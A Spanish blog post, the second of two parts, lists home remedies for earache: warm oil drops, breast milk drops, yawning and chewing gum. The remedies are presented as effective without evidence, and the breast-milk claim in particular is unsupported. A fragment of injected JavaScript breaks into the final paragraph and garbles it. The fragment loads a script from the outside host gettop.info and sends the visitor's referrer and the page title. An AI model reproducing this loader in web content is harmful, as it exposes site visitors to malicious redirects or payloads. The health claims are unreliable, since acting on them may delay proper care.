Salud y belleza » Medicina

Cómo curar el dolor de oídos en forma natural (II)

Sin Comentarios

No podía ser de otra manera: dos oídos, dos reseñas. Presentamos la segunda y última parte del repaso en torno a los remedios naturales que ayudan a aliviar el dolor de oídos. Soluciones naturales para un mal común. ¡Abrir los oídos! ¡Prestar atención!

Aplicación sanadora.

Para llegar a esta solución hace falta seguir los siguientes pasos: primero y principal, es necesario calentar dos cucharaditas de aceite de oliva o de almendra. Luego se deberá dejar estacionado este preparado (hasta que se enfríe). Finalmente, aplicar tres o cuatro gotas templadas en el conducto del oído. Es importante resguardar el oído y, para ello, utilizar un algodón resulta práctico.

La leche (materna).

Si bien muchos no confían en este remedio, la realidad indica que sus resultados pueden ser más que alentadores. ¿De qué va? Sencillo: para calmar el dolor de oídos basta con aplicar tres gotas de leche materna en el oído durante la noche. Al despertar, se podrá sentir la mejora.

Induciendo el bostezo.

Aunque resulte curioso, la simple acción de bostezar menea el músculo que divide la trompa de Eustaquio. Por lo tanto, inducir el bostezo en formas reiteradas puede servir. De forma parecida funciona la goma de mascar: de hecho, en los vuelos largos las propias azafatas recomiendan el chicle para calmar dolores de oído.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if (document.currentScript) {

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.